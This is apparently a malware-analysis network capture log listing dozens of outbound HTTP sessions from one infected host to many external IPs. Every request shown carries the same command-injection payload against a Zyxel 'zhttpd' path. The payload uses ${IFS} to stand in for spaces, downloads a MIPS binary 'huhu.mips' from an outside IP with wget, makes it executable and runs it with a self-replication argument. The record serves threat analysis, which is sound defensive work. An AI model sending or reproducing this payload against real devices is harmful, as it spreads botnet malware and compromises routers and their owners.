                                              Jan 29, 2024 07:03:44.911494970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3198192.168.2.14370988.22.5.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911534071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3199192.168.2.1457784143.212.129.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911569118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3200192.168.2.1433368134.240.144.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911607981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3201192.168.2.144298448.242.134.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911638975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3202192.168.2.1440848185.152.188.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911680937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3203192.168.2.143775848.233.41.86443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911722898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3204192.168.2.145266879.134.185.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911771059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3205192.168.2.1442820175.107.202.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911792040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3206192.168.2.144129446.153.224.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911808014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3207192.168.2.1434712191.25.210.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911863089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3208192.168.2.144865213.112.184.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911927938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3209192.168.2.1454572148.86.223.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911955118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3210192.168.2.145409477.165.51.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.911986113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3211192.168.2.145457891.21.130.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912055969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3212192.168.2.14503308.188.16.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912086964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3213192.168.2.145491424.163.31.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912128925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3214192.168.2.145581051.123.105.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912152052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3215192.168.2.145402678.30.25.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912183046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3216192.168.2.145894218.161.23.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912234068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3217192.168.2.1451802173.63.244.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912275076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3218192.168.2.1439218205.152.143.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912316084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3219192.168.2.1445200155.19.23.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912374973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3220192.168.2.1434216125.56.214.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912410021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3221192.168.2.1448372160.78.154.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912465096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3222192.168.2.1441822185.205.27.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912491083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3223192.168.2.1440268203.174.26.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912532091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3224192.168.2.1458874151.136.133.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912554026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3225192.168.2.1435950221.6.223.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912585974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3226192.168.2.143985860.54.78.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912631035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3227192.168.2.1433320100.54.67.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912656069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3228192.168.2.144829688.150.31.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912695885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3229192.168.2.144080045.223.255.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912750006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3230192.168.2.144510269.22.59.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912787914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3231192.168.2.145626452.236.144.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912807941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3232192.168.2.1450572189.127.127.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912853003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3233192.168.2.144705834.128.60.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912898064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3234192.168.2.144706883.162.176.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912914038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3235192.168.2.144441236.169.114.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.912957907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3236192.168.2.143800490.112.3.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913012028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3237192.168.2.145490696.115.33.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913050890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3238192.168.2.144241091.7.132.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913089037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3239192.168.2.1444530118.103.176.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913146019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3240192.168.2.1460906183.159.187.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913187981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3241192.168.2.1456802124.149.84.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913202047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3242192.168.2.1432822145.151.217.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913228989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3243192.168.2.145435879.165.223.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913263083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3244192.168.2.1448314139.250.81.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913284063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3245192.168.2.1435538155.168.219.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913338900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3246192.168.2.1442018132.42.191.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913358927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3247192.168.2.144796678.154.186.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913403988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3248192.168.2.145589267.235.24.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913460016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3249192.168.2.144219839.196.254.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913496017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3250192.168.2.144055258.183.165.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913533926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3251192.168.2.1453796172.143.188.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913594007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3252192.168.2.1440582199.109.237.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913630009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3253192.168.2.1443166115.212.176.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913657904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3254192.168.2.145736831.211.67.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913686991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3255192.168.2.144903031.141.109.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913737059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3256192.168.2.1452834190.103.170.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913769960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3257192.168.2.1439726179.166.220.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913799047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3258192.168.2.14393041.102.158.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913858891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3259192.168.2.143279859.253.198.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913899899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3260192.168.2.145703863.36.129.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.913911104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3261192.168.2.1446490192.76.116.70443
                                              TimestampBytes transferredDirectionData
